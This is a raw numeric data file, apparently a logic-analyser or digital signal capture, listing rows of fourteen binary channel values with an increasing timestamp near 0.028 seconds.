0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7966524e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7966548e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7966572e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7966596e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7966620e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7966644e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7966672e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7966696e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7966724e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7966748e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7966772e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7966796e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7966824e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7966844e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7966872e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7966896e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7966924e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7966948e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7966972e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7966996e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7967000e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7967044e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7967072e-02 0,0,1,0,0,1,0,0,0,0,0,0,0,0,2.7967076e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7967080e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7967096e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7967124e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7967148e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7967172e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7967196e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7967220e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7967228e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7967272e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7967296e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7967304e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7967324e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7967348e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7967372e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7967396e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7967444e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7967472e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7967476e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7967496e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7967524e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7967528e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7967548e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7967572e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7967576e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7967620e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7967644e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7967652e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7967672e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7967696e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7967724e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7967748e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7967772e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7967796e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7967844e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7967872e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7967924e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7967948e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7967996e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7968020e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7968072e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7968096e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7968124e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7968148e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7968172e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7968196e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7968224e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7968244e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7968272e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7968296e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7968324e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7968348e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7968372e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7968396e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7968424e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7968444e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7968472e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7968500e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7968524e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7968548e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7968556e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7968600e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7968624e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7968632e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7968652e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7968672e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7968724e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7968748e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7968800e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7968824e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7968876e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7968900e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7968924e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7968948e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7968972e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7968996e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7969024e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7969048e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7969076e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7969100e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7969124e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7969148e-02 0,0,1,0,0,0,0,0,0,1,0,0,0,0,2.7969152e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7969156e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7969200e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7969224e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7969232e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7969252e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7969276e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7969300e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7969324e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7969348e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7969372e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7969396e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7969420e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7969444e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7969472e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7969496e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7969524e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7969572e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7969596e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7969604e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7969620e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7969644e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7969672e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7969696e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7969724e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7969748e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7969796e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7969820e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7969844e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7969872e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7969924e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7969948e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7969996e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7970020e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7970072e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7970096e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7970124e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7970148e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7970172e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7970196e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7970200e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7970244e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7970272e-02 0,0,1,0,0,1,0,0,0,0,0,0,0,0,2.7970276e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7970280e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7970296e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7970324e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7970348e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7970372e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7970396e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7970420e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7970472e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7970496e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7970524e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7970548e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7970572e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7970596e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7970620e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7970644e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7970672e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7970696e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7970724e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7970748e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7970796e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7970820e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7970828e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7970844e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7970872e-02 0,0,1,0,0,1,0,0,0,0,0,0,0,0,2.7970876e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7970880e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7970896e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7970920e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7970948e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7970972e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7971020e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7971044e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7971072e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7971096e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7971148e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7971172e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7971220e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7971244e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7971296e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7971324e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7971348e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7971368e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7971396e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7971420e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7971444e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7971468e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7971496e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7971524e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7971544e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7971568e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7971596e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7971620e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7971644e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7971668e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7971692e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7971724e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7971744e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7971768e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7971796e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7971820e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7971844e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7971868e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7971892e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7971920e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7971944e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7971968e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7971996e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7972020e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7972044e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7972068e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7972092e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7972124e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7972144e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7972168e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7972196e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7972220e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,2.8096380e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,2.8096628e-02 1,0,1,0,0,0,0,0,0,0,0,1,0,1,2.8096660e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,2.8096684e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,1,2.8096972e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,2.8096996e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,1,2.8097020e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,2.8097044e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,1,2.8097100e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,2.8097120e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,1,2.8097124e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,1,2.8097172e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,1,2.8097196e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,2.8097204e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,1,2.8097248e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,2.8097272e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8097276e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8097300e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8097320e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8097348e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8097372e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8097376e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.8097420e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8097444e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8097452e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8097496e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8097520e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8097524e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.8097548e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8097572e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.8097596e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8097620e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.8097644e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8097672e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8097676e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8097720e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8097748e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8097772e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8097796e-02 1,0,1,0,0,0,0,0,0,1,0,0,0,0,2.8097800e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8097804e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.8097848e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8097872e-02 1,0,1,0,0,1,0,0,0,0,0,0,0,0,2.8097876e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8097880e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8097896e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8097920e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8097948e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8097972e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8097996e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8098020e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8098044e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8098072e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8098096e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8098116e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8098148e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8098172e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8098196e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8098220e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8098244e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8098272e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8098320e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8098348e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.8098396e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8098420e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8098428e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8098472e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8098496e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8098520e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8098548e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8098572e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8098596e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8098620e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8098644e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8098672e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8098696e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8098716e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8098748e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8098772e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8098796e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8098820e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8098844e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8098872e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8098896e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8098924e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8098948e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8098972e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8098996e-02 1,0,1,0,0,0,0,0,0,1,0,0,0,0,2.8099000e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8099004e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.8099048e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8099072e-02 1,0,1,0,0,1,0,0,0,0,0,0,0,0,2.8099076e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8099080e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8099096e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8099124e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8099148e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8099172e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8099196e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8099220e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8099228e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.8099272e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8099296e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8099304e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8099324e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8099348e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8099396e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8099420e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8099428e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.8099444e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8099472e-02 1,0,1,0,0,1,0,0,0,0,0,0,0,0,2.8099476e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8099480e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8099496e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8099524e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8099548e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8099572e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8099576e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.8099620e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8099644e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8099652e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8099672e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8099696e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8099724e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8099748e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8099796e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8099820e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8099828e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.8099844e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8099872e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.8099896e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8099924e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.8099948e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8099972e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.8099996e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8100020e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8100028e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8100072e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8100096e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8100124e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8100148e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8100172e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8100196e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8100220e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8100244e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8100272e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8100296e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8100324e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8100348e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8100372e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8100396e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8100420e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8100444e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8100468e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8100492e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8100500e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.8100544e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8100572e-02 1,0,1,0,0,1,0,0,0,0,0,0,0,0,2.8100576e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8100580e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8100620e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8100644e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8100652e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.8100668e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8100692e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.8100716e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8100744e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.8100772e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8100796e-02 1,0,1,0,0,1,0,0,0,0,0,0,0,0,2.8100800e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8100804e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8100844e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8100868e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8100892e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8100916e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8100944e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8100968e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8100996e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8101020e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8101044e-02 